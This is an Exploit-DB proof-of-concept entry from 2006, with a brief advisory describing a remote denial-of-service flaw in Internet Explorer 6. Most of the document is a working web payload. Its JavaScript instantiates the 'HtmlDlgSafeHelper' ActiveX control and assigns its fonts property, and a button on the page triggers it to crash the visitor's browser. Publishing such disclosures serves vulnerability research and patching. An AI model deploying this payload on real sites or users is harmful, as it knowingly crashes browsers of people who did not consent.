Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service

EDB-ID:

28202


Author:

hdm

Type:

dos


Platform:

Windows

Date:

2006-07-10


source: https://www.securityfocus.com/bid/18929/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability.

This issue is triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

// MoBB Demonstration
function Demo() {
	var a = new ActiveXObject('HtmlDlgSafeHelper.HtmlDlgSafeHelper');
	a.fonts = "Goodbye!";
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>